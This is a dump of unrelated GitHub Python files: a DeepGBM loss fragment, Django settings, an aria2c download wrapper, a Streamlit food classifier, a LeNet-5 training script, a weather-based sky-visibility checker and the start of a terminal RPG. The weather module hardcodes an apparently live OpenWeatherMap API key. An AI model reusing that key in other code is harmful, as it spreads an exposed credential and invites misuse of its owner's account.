nn.MSELoss(reduction=\"none\")(emb_pred, emb_target) * loss_weight\n )\n return torch.mean(torch.sum(l2_loss, dim=1))\n\n def joint_loss(self, out, target, emb_pred, emb_target, ratio):\n return (1 - ratio) * self.criterion(\n out, target\n ) + ratio * self.emb_loss(emb_pred, emb_target)\n\n def true_loss(self, out, target):\n return self.criterion(out.to(self.device), target.to(self.device))\n","repo_name":"ELKYang/quant_research","sub_path":"2.DeepGBM/model_components.py","file_name":"model_components.py","file_ext":"py","file_size_in_byte":10689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6552344261","text":"# Django settings\n\ntry:\n from local_settings import *\nexcept ImportError:\n import sys\n sys.stderr.write(\"Error importing local settings. Did you remember to make a local_settings.py?\\n\");\n sys.exit(1)\n\n\nADMINS = (\n ('Carl Jackson', 'ctj@mit.edu'),\n)\n\nMANAGERS = ADMINS\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale\nUSE_L10N = True\n\n# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a\n# trailing slash.\n# Examples: \"http://foo.com/media/\", \"/media/\".\n# ADMIN_MEDIA_PREFIX = '/admin/media/'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.load_template_source',\n 'django.template.loaders.app_directories.load_template_source',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.csrf.middleware.CsrfMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n)\n\nROOT_URLCONF = 'urls'\n\nTEMPLATE_DIRS = (\n SITE_ROOT + 'templates/',\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.humanize',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.admin',\n 'registration',\n 'competition',\n 'abacus',\n)\n\n# Email stuff\nDEFAULT_FROM_EMAIL = 'Harvard-MIT Mathematics Tournament '\nEMAIL_PREFIX = '[HMMT] '\n\n# Login stuff\nLOGIN_URL = '/february/accounts/login/'\nLOGIN_REDIRECT_URL = '/february/registration/teams/'\n","repo_name":"zenazn/coatl","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"38932638129","text":"\nimport subprocess\n\n__download_tools = {}\n\ndefault_config = {\n \"aria2\": {\n \"extra_opts\": (\"-s10\", \"-x10\")\n }\n}\n\n\ndef get_download_tool(name):\n return __download_tools.get(name, None)\n\ndef download_tool(name):\n def register(cls):\n config = default_config.get(name, None)\n assert isinstance(config, dict)\n if config:\n __download_tools[name] = cls(**config)\n else:\n __download_tools[name] = cls()\n return cls\n return register\n\n\nclass DownloadTool(object):\n \"\"\"\n Interface definition for all download tools\n \"\"\"\n def download(self, uri='', resume=True, dir_path=\"\", file_name=\"\", headers=\"\"):\n pass\n\n@download_tool(\"aria2\")\nclass Aria2(DownloadTool):\n def __init__(self, default_header=\"\", extra_opts=None):\n self.__default_headers = default_header\n self.__extra_opts = None\n if isinstance(extra_opts, str):\n self.__extra_opts = extra_opts.split()\n elif type(extra_opts) in (list, tuple):\n self.__extra_opts = extra_opts\n else:\n self.__extra_opts = str(extra_opts)\n\n def download(self, uri='', resume=True, dir_path=\"\", file_name=\"\", headers=\"\"):\n aria2_opts = ['aria2c', '--header=' + headers, uri, '--dir', dir_path, '--out', file_name, '--file-allocation=none']\n if resume:\n aria2_opts.append('-c')\n if self.__extra_opts:\n aria2_opts.extend(self.__extra_opts)\n exit_code = subprocess.call(aria2_opts)\n if exit_code != 0:\n raise Exception('aria2c exited abnormally')\n","repo_name":"pandazxx/music163","sub_path":"downloadtool.py","file_name":"downloadtool.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14654024386","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport streamlit as st\r\nfrom PIL import Image\r\nimport random\r\n\r\n# list of all 101 class names\r\nclass_names = ['apple_pie',\r\n 'baby_back_ribs',\r\n 'baklava',\r\n 'beef_carpaccio',\r\n 'beef_tartare',\r\n 'beet_salad',\r\n 'beignets',\r\n 'bibimbap',\r\n 'bread_pudding',\r\n 'breakfast_burrito',\r\n 'bruschetta',\r\n 'caesar_salad',\r\n 'cannoli',\r\n 'caprese_salad',\r\n 'carrot_cake',\r\n 'ceviche',\r\n 'cheesecake',\r\n 'cheese_plate',\r\n 'chicken_curry',\r\n 'chicken_quesadilla',\r\n 'chicken_wings',\r\n 'chocolate_cake',\r\n 'chocolate_mousse',\r\n 'churros',\r\n 'clam_chowder',\r\n 'club_sandwich',\r\n 'crab_cakes',\r\n 'creme_brulee',\r\n 'croque_madame',\r\n 'cup_cakes',\r\n 'deviled_eggs',\r\n 'donuts',\r\n 'dumplings',\r\n 'edamame',\r\n 'eggs_benedict',\r\n 'escargots',\r\n 'falafel',\r\n 'filet_mignon',\r\n 'fish_and_chips',\r\n 'foie_gras',\r\n 'french_fries',\r\n 'french_onion_soup',\r\n 'french_toast',\r\n 'fried_calamari',\r\n 'fried_rice',\r\n 'frozen_yogurt',\r\n 'garlic_bread',\r\n 'gnocchi',\r\n 'greek_salad',\r\n 'grilled_cheese_sandwich',\r\n 'grilled_salmon',\r\n 'guacamole',\r\n 'gyoza',\r\n 'hamburger',\r\n 'hot_and_sour_soup',\r\n 'hot_dog',\r\n 'huevos_rancheros',\r\n 'hummus',\r\n 'ice_cream',\r\n 'lasagna',\r\n 'lobster_bisque',\r\n 'lobster_roll_sandwich',\r\n 'macaroni_and_cheese',\r\n 'macarons',\r\n 'miso_soup',\r\n 'mussels',\r\n 'nachos',\r\n 'omelette',\r\n 'onion_rings',\r\n 'oysters',\r\n 'pad_thai',\r\n 'paella',\r\n 'pancakes',\r\n 'panna_cotta',\r\n 'peking_duck',\r\n 'pho',\r\n 'pizza',\r\n 'pork_chop',\r\n 'poutine',\r\n 'prime_rib',\r\n 'pulled_pork_sandwich',\r\n 'ramen',\r\n 'ravioli',\r\n 'red_velvet_cake',\r\n 'risotto',\r\n 'samosa',\r\n 'sashimi',\r\n 'scallops',\r\n 'seaweed_salad',\r\n 'shrimp_and_grits',\r\n 'spaghetti_bolognese',\r\n 'spaghetti_carbonara',\r\n 'spring_rolls',\r\n 'steak',\r\n 'strawberry_shortcake',\r\n 'sushi',\r\n 'tacos',\r\n 'takoyaki',\r\n 'tiramisu',\r\n 'tuna_tartare',\r\n 'waffles']\r\n\r\n\r\n# loading the modle\r\n@st.cache(allow_output_mutation=True) # setting up cache for the model\r\ndef load_model():\r\n model = tf.keras.models.load_model('effi_080_second.h5')\r\n return model\r\n\r\n# call the model to predict the class of the image\r\nmodel = load_model()\r\n\r\n# showing a Header\r\n# st.title('Food 101 Classifier™')\r\nst.markdown(\"

Food 101 Classifier™

\", unsafe_allow_html=True)\r\nst.write('A image classifier based on the Food 101 dataset')\r\ncol1, col2 = st.beta_columns(2)\r\n\r\n\r\n# Asking for file\r\nfile = col2.file_uploader(\"Upload an image of food\", type=[\"png\", \"jpg\"])\r\n#food images list\r\nsam_lst = ['None', 'Icecream', 'Pizza', 'Waffels', 'Steak']\r\n# random greet !!!\r\ng_lst = ['you ordered >> ', 'so you like >> ', 'want to have some >> ', \"your today's lunch >> \", \"your favorite food is >> \", \"serving >> \"]\r\n# getting random greeting\r\ngreet = random.choice(g_lst)\r\n\r\n\r\n# function for predicting food class with a custom image\r\ndef predict_class(file, greet):\r\n \"\"\"Functon that will prepare the images and will predict the class\"\"\"\r\n img = Image.open(file)\r\n img2 = img.copy()\r\n img2.resize((300, 300))\r\n col1.image(img2,caption=f\"Looks Delicious!! \", use_column_width=True)\r\n # converting the image to a numpy array\r\n img_array = np.array(img)\r\n # reshaping the image to a 4d tensor usable by the model\r\n img = tf.image.resize(img_array, size=(224,224))\r\n img = tf.expand_dims(img, axis=0)\r\n pred = model.predict(img)\r\n pred_cls = class_names[pred.argmax()]\r\n col2.success(greet + pred_cls) # showing the prediction class name\r\n\r\n\r\n# prdeicting the class of the image from the file / custome image and samples\r\nif file is not None:\r\n with st.spinner('Hold on your food is getting cooked...'):\r\n predict_class(file, greet)\r\nelse:\r\n col1.warning(\"No image uploaded. You can use sample imgaes from below list\")\r\n file2 = col1.selectbox('Select from sample images', options=sam_lst)\r\n if file2 == 'Icecream':\r\n file = 'icecream.jpg'\r\n with st.spinner('Hold on your food is getting cooked...'):\r\n predict_class(file, greet)\r\n elif file2 == 'Pizza':\r\n file = 'pizza.jpg'\r\n with st.spinner('Hold on your food is getting cooked...'):\r\n predict_class(file, greet)\r\n elif file2 == 'Waffels': \r\n file = 'waffels.jpg'\r\n with st.spinner('Hold on your food is getting cooked...'):\r\n predict_class(file, greet) \r\n elif file2 == 'Steak':\r\n file = 'steak.jpg'\r\n with st.spinner('Hold on your food is getting cooked...'): \r\n predict_class(file, greet) \r\n else:\r\n pass\r\n \r\nnote = \"\"\" \r\n\\n\r\nThis project based on the [Food101](https://data.vision.ee.ethz.ch/cvl/datasets_extra/food-101/) Paper which used Convolutional Neuranetwork trained for 2 to 3 days to achieve 77.4% top-1 accuracy.\r\nThe project is made by download the food101 dataset from the [TensorFlow dataset](https://www.tensorflow.org/datasets/catalog/food101)(size: 4.6GB) which consists of 750 images x 101 training classes = 75750 training images.\r\nI used the [EfficientNetB0](https://www.tensorflow.org/api_docs/python/tf/keras/applications/EfficientNetB0) model with fine-tune unfreeze all layers of the model. \\n\r\nAlthough this WebApp model accuracy is around 80% to 82%. I am also sharing the [notebook](https://colab.research.google.com/drive/15sJJhrZBo12CA3flnrX-NC4WwrP84z0D?usp=sharing) for this project.\r\n[Github](https://github.com/subha996/food-101_updated)\r\n\"\"\"\r\nst.write(note)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nwith st.beta_expander('Food Names(Classes), The model will work better if you chose food from this list'):\r\n st.write(class_names)\r\n","repo_name":"subha996/food-101_updated","sub_path":"food101.py","file_name":"food101.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17250694840","text":"#!/usr/bin/env python\n\"\"\"\nThis file contains LeNet-5 training script\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n#-------------------------------------------------------------------------------\n__author__ = \"Ando Ki\"\n__copyright__ = \"Copyright 2020 Ando Ki\"\n__credits__ = [\"none\", \"some\"]\n__license__ = \"The 2-Clause BSD License\"\n__version__ = \"0\"\n__revision__ = \"1\"\n__maintainer__ = \"Ando Ki\"\n__email__ = \"contact@future-ds.com\"\n__status__ = \"Development\"\n__date__ = \"2020.10.01\"\n__description__= \"LeNet-5 network model training script\"\n\n#-------------------------------------------------------------------------------\n# Note it saves parameter-only and model-included as swll.\n#-------------------------------------------------------------------------------\nimport argparse\nimport shutil\nimport os\nimport sys\n\nimport numpy as np\n\nimport torch\nfrom torchvision.datasets import mnist\nfrom torch.nn import CrossEntropyLoss\nfrom torch.optim import SGD\nfrom torch.utils.data import DataLoader\nimport torchvision.transforms as transforms\n# Following causes AttributeError: 'SummaryWriter' object has no attribute 'export_scalars_to_json'\n#from torch.utils.tensorboard import SummaryWriter\nfrom tensorboardX import SummaryWriter\n\nfrom darknet_lenet5_utils import *\nfrom lenet5_model import Lenet5Model\n\n#-------------------------------------------------------------------------------\ndef get_dataset( args ):\n \"\"\"\n It prepares MNIST dataset.\n \"\"\"\n train_dataset = mnist.MNIST( root='dataset.train' # see train/MNIST/\n , train=True\n , download=True\n , transform=transforms.Compose([\n transforms.Resize((32, 32))\n ,transforms.Grayscale(num_output_channels=args.input_channels) # make 3 channels (does not work)\n ,transforms.ToTensor()]))\n test_dataset = mnist.MNIST( root='dataset.test'\n , train=False\n , download=True\n , transform=transforms.Compose([\n transforms.Resize((32, 32))\n ,transforms.Grayscale(num_output_channels=args.input_channels) # make 3 channels (does not work)\n ,transforms.ToTensor()]))\n train_loader = DataLoader( train_dataset\n , batch_size=args.batch_size\n , num_workers=8)\n test_loader = DataLoader( test_dataset\n , batch_size=args.batch_size\n , num_workers=8)\n return train_loader, test_loader\n\n#-------------------------------------------------------------------------------\ndef build_model( args ):\n \"\"\"\n It build LeNet-5 model and load checkpoint if specified.\n \"\"\"\n if args.pre_trained_type == 'none':\n model = Lenet5Model(args.input_channels)\n else:\n extension = os.path.splitext(args.pre_trained_weights)[1]\n if extension == '.pkl': # args.pre_trained_weights.endswitch('.pkl')\n model = torch.load(args.pre_trained_weights)\n elif extension == '.pth':\n if args.pre_trained_type == 'model':\n model = torch.load(args.pre_trained_weights)\n elif args.pre_trained_type == 'params':\n model = Lenet5Model(args.input_channels)\n model.load_state_dict(torch.load(args.pre_trained_weights))\n else:\n print(f\"Model type {args.pre_trained_type} not known\")\n return None, None, None\n elif extension == '.onnx':\n model = torch.onnx.load(args.pre_trained_weights)\n torch.onnix.checker.check_model(model)\n elif extension == '.weights':\n model = Lenet5Model(args.input_channels)\n load_weights(model, args.pre_trained_weights)\n else:\n print(\"un-known data file: \", args.pre_trained_weights);\n return None, None, None\n optimizer = SGD(model.parameters(), lr=args.learning_rate)\n cross_error = CrossEntropyLoss() # loss function\n return model, optimizer, cross_error\n\n#-------------------------------------------------------------------------------\ndef train_one_mini_batch( args\n , model\n , images # input images\n , labels # expected label for the input images\n , cross_error # error function\n , optimizer # otptimizer\n ):\n \"\"\"\n It runs a train on a mini-batch, which consists of a number of images.\n \"\"\"\n predicts = model(images.float())\n error = cross_error(predicts, labels.long()) # CrossEntropyLoss(calculated, expected)\n optimizer.zero_grad()\n error.backward() # loss\n optimizer.step()\n return error\n\n#-------------------------------------------------------------------------------\ndef evaluate_one_mini_batch( args\n , model\n , images # input images\n , labels # expected label\n ):\n \"\"\"\n It runs an evaluation on a mini-batch, which consists of a number of images.\n \"\"\"\n predicts = model(images.float()).detach()\n predicts_ys = np.argmax(predicts, axis=-1) # get id of max value\n matched = predicts_ys == labels\n correct = np.sum(matched.numpy(), axis=-1) # num of mached\n sum = matched.shape[0] # number of items (images) in the mini-batch\n return correct, sum\n\n#-------------------------------------------------------------------------------\ndef save_checkpoint( args\n , model\n , accuracy\n , epoch\n ):\n \"\"\"\n It ssave 'checkpoint' if required.\n It return 'True' for end-condition.\n \"\"\"\n if not hasattr(save_checkpoint, \"accuracy_old\"):\n save_checkpoint.accuracy_old = 0\n if accuracy>accuracy_old:\n torch.save(model, f\"{args.checkpoints}{os.sep}mnist_model_{accuracy:.3f}.pth\")\n torch.save(model.state_dict(), f\"{args.checkpoints}{os.sep}mnist_params_{accuracy:.3f}.pth\")\n dummy_input = torch.randn(1, args.input_channels, 32, 32, requires_grad=True)\n #batch_size, input_channel, input_height, input_width\n torch.onnx.export(model, dummy_input,\n f\"{args.checkpoints}{os.sep}mnist_model_{accuracy:.3f}.onnx\")\n if (not args.keep) and (f\"{accuracy_old:.3f}\" != f\"{accuracy:.3f}\"):\n pathX = f\"{args.checkpoints}{os.sep}mnist_model_{accuracy_old:.3f}.pth\"\n if os.path.exists(pathX): os.remove(pathX)\n pathX = f\"{args.checkpoints}{os.sep}mnist_params_{accuracy_old:.3f}.pth\"\n if os.path.exists(pathX): os.remove(pathX)\n pathX = f\"{args.checkpoints}{os.sep}mnist_model_{accuracy_old:.3f}.onnx\"\n if os.path.exists(pathX): os.remove(pathX)\n pathX = f\"{args.checkpoints}{os.sep}mnist_{accuracy_old:.3f}.weights\"\n if os.path.exists(pathX): os.remove(pathX)\n save_checkpoint.accuracy_old = accuracy\n \n if (float(accuracy)>=float(args.accuracy)):\n torch.save(model, f\"{args.checkpoints}{os.sep}mnist_model_final.pth\")\n torch.save(model.state_dict(), f\"{args.checkpoints}{os.sep}mnist_params_final.pth\")\n dummy_input = torch.randn(1, args.input_channels, 32, 32, requires_grad=False)\n torch.onnx.export(model, dummy_input, '{}/mnist_model_final.onnx'.format(args.checkpoints))\n save_weights(model, f\"{args.checkpoints}{os.sep}mnist_final.weights\")\n print(f\"Look {args.checkpoints}{os.sep}mnist_model_final.pth\")\n print(f\"Look {args.checkpoints}{os.sep}mnist_params_final.pth\")\n print(f\"Look {args.checkpoints}{os.sep}mnist_model_final.onnx\")\n print(f\"Look {args.checkpoints}{os.sep}mnist_final.weights\")\n return True\n elif epoch == (args.epochs-1):\n torch.save(model, f\"{args.checkpoints}{os.sep}mnist_model_last.pth\")\n torch.save(model.state_dict(), f\"{args.checkpoints}{os.sep}mnist_params_last.pth\")\n dummy_input = torch.randn(1, args.input_channels, 32, 32, requires_grad=False)\n torch.onnx.export(model, dummy_input, '{}/mnist_model_last.onnx'.format(args.checkpoints))\n save_weights(model, f\"{args.checkpoints}{os.sep}mnist_last.weights\")\n print(f\"Look {args.checkpoints}{os.sep}mnist_model_last.pth\")\n print(f\"Look {args.checkpoints}{os.sep}mnist_param_last.pth\")\n print(f\"Look {args.checkpoints}{os.sep}mnist_model_last.onnx\")\n print(f\"Look {args.checkpoints}{os.sep}mnist_last.weights\")\n return False\n\n#-------------------------------------------------------------------------------\nif __name__ == '__main__':\n def get_args():\n parser = argparse.ArgumentParser(description='PyTorch LeNet-5')\n parser.add_argument('-i', '--input_channels', type=int, default=1,\n metavar='input_channels',\n help='input channel size (default: 1)')\n parser.add_argument('-b', '--batch_size', type=int, default=100, # 60,000/100=600 iteration==> one epoch\n metavar='batch_size',\n help='input batch size (default: 100)')\n parser.add_argument('-e', '--epochs', type=int, default=100,\n metavar='epochs',\n help='number of epochs to train (default: 100)')\n parser.add_argument('-l', '--learning_rate', type=float, default=0.1,\n metavar='learning_rate',\n help='learning rate (default: 0.1)')\n parser.add_argument('-a', '--accuracy', type=float, default=0.99,\n metavar='accuracy',\n help='accuracy (default: 0.99)')\n parser.add_argument('-c', '--checkpoints', type=str, default=\"checkpoints\",\n metavar='checkpoints',\n help='directory name for checkpoint (default: checkpoints)')\n parser.add_argument('-t', '--pre_trained_type', type=str\n ,choices=[\"params\", \"model\", \"weights\", \"none\"]\n ,default=\"none\"\n ,metavar='type'\n ,help='type of pre-trained weights: \\\"model\\\", \\\"params\\\", \\\"weights\\\", or \\\"none\\\" (default: \\\"model\\\")')\n parser.add_argument('-w', '--pre_trained_weights', type=str, default=\"checkpoints/mnist_params_final.pth\",\n metavar='file_name',\n help=\"pre-trained weight or model path_file_name for checkpoint when '--type' is not none (default: checkpoints/mnist_final.pth)\")\n parser.add_argument('-g', '--logdir', type=str, default=\"tensorboard\",\n metavar='logdir',\n help='directory name for log (default: tensorboard)')\n parser.add_argument('-k', '--keep', action='store_true',\n help='make keep intermediate weights (default: False)')\n parser.add_argument('-r', '--rigor', action='store_true',\n help='set rigor (default: False)')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='make verbose (default: False)')\n parser.add_argument('-d', '--debug', action='store_true',\n help='make debug (default: False)')\n args = parser.parse_args()\n return args\n\n#-------------------------------------------------------------------------------\nif __name__ == '__main__':\n args = get_args()\n\n if not os.path.exists(args.checkpoints): os.makedirs(args.checkpoints)\n\n train_loader, test_loader = get_dataset( args )\n model, optimizer, cross_error = build_model( args )\n model.train() # let the model know it is training, i.e., it sets the mode to train\n\n if args.debug:\n items = list(model.__dict__['_modules'].items())[0][1]\n print(f\"{items[0].__class__.__name__}.bias.data={items[0].bias.data}\")\n\n if os.path.isdir(args.logdir): shutil.rmtree(args.logdir)\n os.makedirs(args.logdir)\n log = SummaryWriter(args.logdir)\n log.add_graph(model, torch.rand(args.batch_size, args.input_channels, 32, 32))\n\n if args.debug:\n print(f\"{items[0].__class__.__name__}.bias.data={items[0].bias.data}\")\n\n if args.verbose:\n # Print model and optimizer and cross_error\n print(model)\n print(model.__dict__['_modules'])\n print(optimizer)\n print(cross_error)\n # Print model's state_dict\n print(\"Model's state_dict:\")\n for param_tensor in model.state_dict():\n print(param_tensor, \"\\t\", model.state_dict()[param_tensor].size())\n\n # Print optimizer's state_dict\n print(\"Optimizer's state_dict:\")\n for var_name in optimizer.state_dict():\n print(var_name, \"\\t\", optimizer.state_dict()[var_name])\n\n accuracy_old=0\n for epoch in range(args.epochs):\n for idx, (train_x, train_label) in enumerate(train_loader):\n # idx: 0 to (num of mini-batches 600,000/100 -1 )[0:599]\n # train_x: 100 images of size 32x32\n # train_label: 100 elements\n model.train() # set the mode to train\n error = train_one_mini_batch(args, model, train_x, train_label, cross_error, optimizer)\n if idx % (args.batch_size) == 0: # print error after each batch\n print('idx: {}, error: {}'.format(idx, error))\n\n correct = 0\n sum = 0\n for idx, (test_x, test_label) in enumerate(test_loader):\n model.eval() # set the mode to evaluate (not to train)\n c, s = evaluate_one_mini_batch(args, model, test_x, test_label)\n correct += c # accumulate the num of mached\n sum += s # accumulate the number of items\n accuracy = correct/sum # ratio of correct from sum\n print(f\"epoch: {epoch}, accuracy: {accuracy}\")\n print(\"----------------------------------\")\n\n log.add_scalar('Train/accuracy', accuracy, epoch)\n log.add_scalar('Train/error', error, epoch)\n\n if save_checkpoint(args, model, accuracy, epoch):\n break\n\n log.export_scalars_to_json(args.logdir + os.sep + \"all_logs.json\")\n log.close()\n\n#===============================================================================\n# Revision history:\n#\n# 2020.10.01: Started by Ando Ki (adki@future-ds.com)\n#===============================================================================\n","repo_name":"adki/DLR_Projects","sub_path":"LeNet-5/LeNet-5.pytorch/src/lenet5_train.py","file_name":"lenet5_train.py","file_ext":"py","file_size_in_byte":14936,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"14036220159","text":"from astral import LocationInfo\nfrom astral.sun import sun\nimport datetime\nimport pyowm\nimport time\n# Libraries needed to run this class.\n\nowm = pyowm.OWM(\"fc1d78e5bdb6e3e613600e91faa22e79\")\nmgr = owm.weather_manager()\n# Stuff needed for OpenWeatherMap to work, including a subscription code.\n\n\nclass WeatherService:\n def __init__(self, latitude, longitude, unix):\n self.lat = latitude\n self.lon = longitude\n self.unix = int(unix)\n # Class is asking for a latitude, longitude, and unix timestamp for the ISS's flyover.\n\n self.now = time.time()\n self.hours = int((self.unix - self.now) / 3600)\n self.days = int((self.unix - self.now) / 86400)\n # Hours and days from now.\n\n self.year = int(datetime.datetime.fromtimestamp(self.unix).strftime(\"%Y\"))\n self.month = int(datetime.datetime.fromtimestamp(self.unix).strftime(\"%m\"))\n self.day = int(datetime.datetime.fromtimestamp(self.unix).strftime(\"%d\"))\n self.minute = int(datetime.datetime.fromtimestamp(self.unix).strftime(\"%M\"))\n self.hour = int(datetime.datetime.fromtimestamp(self.unix).strftime(\"%H\"))\n if self.minute >= 30:\n self.hour += 1\n # The year, month and day of the inputted unix timestamp.\n\n self.one_call = mgr.one_call(lat=self.lat, lon=self.lon)\n self.cloudiness = int()\n # Location and cloud stuff for using OpenWeatherMap with PyOWM.\n\n self.loc = LocationInfo(timezone=\"Europe/London\", latitude=self.lat, longitude=self.lon)\n self.s = sun(self.loc.observer, date=datetime.date(self.year, self.month, self.day))\n # Location info stuff needed to find out when the sun goes up and down (thank you StackOverflow).\n self.sunup = str()\n self.sundown = str()\n self.uphour = int()\n self.downhour = int()\n # Sun up/down stuff.\n\n self.visible = False\n # Making the assumption that the night sky isn't visible.\n\n def clearsky(self):\n if self.hours < 0:\n return \"Error: Negative timestamp\"\n # If the unix timestamp is in the past.\n\n elif 0 <= self.hours <= 47:\n self.cloudiness = int(self.one_call.forecast_hourly[self.hours].clouds)\n # If the unix timestamp is within 48 hours from now, we can get an hourly cloud check.\n\n elif self.days <= 6:\n self.cloudiness = int(self.one_call.forecast_daily[self.days].clouds)\n # If the unix timestamp is greater than 48 hours from now, we can get daily cloud checks for up to 7 days from\n # now.\n\n else:\n return \"Error: Timestamp too far into the future\"\n # We can't get any weather data further than a week from now.\n\n self.sunup = str(self.s[\"sunrise\"]).split(\" \")[1].split(\".\")[0]\n self.sundown = str(self.s[\"sunset\"]).split(\" \")[1].split(\".\")[0]\n # Getting the time (hours:minutes:seconds) of sunset and sunrise on the day of the unix timestamp.\n\n self.uphour = int(self.sunup.split(\":\")[0])\n if int(self.sunup.split(\":\")[1]) >= 30:\n self.uphour += 1\n # Getting the time of sunrise rounded to nearest hour.\n\n self.downhour = int(self.sundown.split(\":\")[0])\n if int(self.sundown.split(\":\")[1]) >= 30:\n self.downhour += 1\n # Getting the time of sunset rounded to nearest hour.\n\n if self.cloudiness < 25 and (self.uphour > self.hour or self.downhour < self.hour):\n self.visible = True\n # If there is less than 25% clouds and the unix time is before sunrise or after sunset.\n\n return self.visible\n # Return a bool. True if the nightsky is visible.\n\n\naarhus = WeatherService(56.158150, 10.212030, 1644500918)\n\nprint(aarhus.clearsky())\n","repo_name":"emiln2002/ISS_tracker","sub_path":"WeatherService.py","file_name":"WeatherService.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1711401337","text":"# test.py - a test build of a new and improved terminal RPG engine\r\n'''\r\n Implement TODO:\r\n -local multiplayer combat isn't working. Sockets are hard, who knew?\r\n Probably won't get finished since it's a huge hassle for such little\r\n return but it was close! It worked locally at least, so that's cool. \r\n I'll probably keep the local element just for demonstration purposes.\r\n'''\r\nfrom msvcrt import getch\r\nimport sys\r\nimport os\r\nimport socket\r\nimport textwrap\r\nimport random\r\nimport ast\r\n\r\nimport faces\r\nfrom client import clientData\r\nfrom data import mapData\r\nfrom data import playerData\r\nfrom data import enemyData\r\nfrom data import enemyClass\r\nfrom maps import gamePlayMaps\r\nfrom maps import staticMaps\r\nfrom mapChange import changeMap\r\nimport subprocess\r\n\r\n\r\n\r\n## Runs game opening text of story and controls\r\nimport open_text\r\n\r\n\r\n\r\n\r\n####################################\r\n##### GLOBAL DATA #####\r\n####################################\r\n\r\nclass globalStates():\r\n\r\n ## gold won in combat to be printed later\r\n won_gold = 0\r\n \r\n # Gameplay map currently being rendered\r\n current_map = gamePlayMaps.map1\r\n \r\n # Gameplay commands used from player input for map - first assigned at runtime\r\n current_commands = None\r\n \r\n # Map to return to from pause menu\r\n return_map = None\r\n\r\n ## List of static maps for referencing in play loop\r\n static_maps = [staticMaps.menu, staticMaps.console_menu, \r\n staticMaps.shop_menu, staticMaps.upgrade_menu,\r\n staticMaps.multiplayer_menu]\r\n combat_maps = [staticMaps.combat_map_enemy, staticMaps.combat_map_pl]\r\n\r\n\r\n\r\n####################################\r\n##### MAP FUNCTIONS #####\r\n####################################\r\n\r\ndef overwrite_map(w_map):\r\n \r\n for i in range(len(w_map)):\r\n for j in range(len(w_map[0])):\r\n if w_map[i][j] == 'X':\r\n w_map[i][j] = ' '\r\n\r\n\r\ndef print_map(p_map):\r\n\r\n ## Print player data at top of map\r\n print(f'\\n HP: {str(playerData.HP)}/{str(playerData.MAX_HP)} G: {str(playerData.GOLD)}')\r\n\r\n ## Print the Map\r\n for i in range(len(p_map)):\r\n for j in range(len(p_map[0])):\r\n print(p_map[i][j], end='')\r\n print()\r\n\r\n\r\ndef print_combat_screen(turn):\r\n\r\n ## Set map to players turn\r\n if turn == 1 or turn == 0:\r\n globalStates.current_map = staticMaps.combat_map_pl\r\n if turn == 2:\r\n globalStates.current_map = staticMaps.combat_map_enemy\r\n ## Print the map\r\n print(globalStates.current_map)\r\n\r\n\r\n ## print combatants health\r\n print(f' HP: {playerData.HP}/{playerData.MAX_HP} {enemyData.current_enemy.rank} {enemyData.current_enemy.name}: {enemyData.current_enemy.hp}')\r\n if turn == 0:\r\n print(f'\\n\\t[1] Laser Cannon\\n\\t[2] Missile ({str(playerData.MISSILES)})\\n\\t[3] Repairkit ({str(playerData.REPAIRKITS)})')\r\n\r\n\r\n\r\n\r\n###################################\r\n###### DIALOGUE / CONVO ######\r\n##################################\r\n\r\ndef dialoguePrompt(face, messages):\r\n print_face = face\r\n print_message = random.choice(messages)\r\n\r\n clear()\r\n print(f'\\t\\n {enemyData.current_enemy.rank} {enemyData.current_enemy.name} says:')\r\n print(random.choice(print_face))\r\n text = textwrap.wrap(print_message, 25)\r\n for j in range(len(text)):\r\n print(text[j].center(36))\r\n getch()\r\n\r\n\r\n# ### cut ###\r\n# def speakableList(cur_map):\r\n\r\n# ##### MAP 2 #####\r\n# ## GIRL\r\n# if cur_map == gamePlayMaps.map2:\r\n# if (cur_map[mapData.pos_x][mapData.pos_y+1] == 'Q') or \\\r\n# (cur_map[mapData.pos_x][mapData.pos_y-1] == 'Q'):\r\n# dialoguePrompt(faces.girl.face, faces.girl.messages)\r\n\r\n\r\n\r\n\r\n\r\n##################################################\r\n###### FUNCTIONALITY AND GAMEPLAY ######\r\n##################################################\r\n\r\ndef clear():\r\n os.system('cls')\r\n\r\n\r\n\r\n################################################\r\n####### INPUT AND COMMANDS #######\r\n################################################\r\n\r\n\r\n## This is the bulk of movement control. This command-function holds the main inputs\r\n# by players and does collision detection before making the move. If the move is through\r\n# a door, this is handled by the if/else blocks inside the cmd='' blocks. It basically\r\n# checks if the move is going to be into a door, and if it is, it returns True. This is\r\n# returned in the main loop, where a true return results in that info being sent to 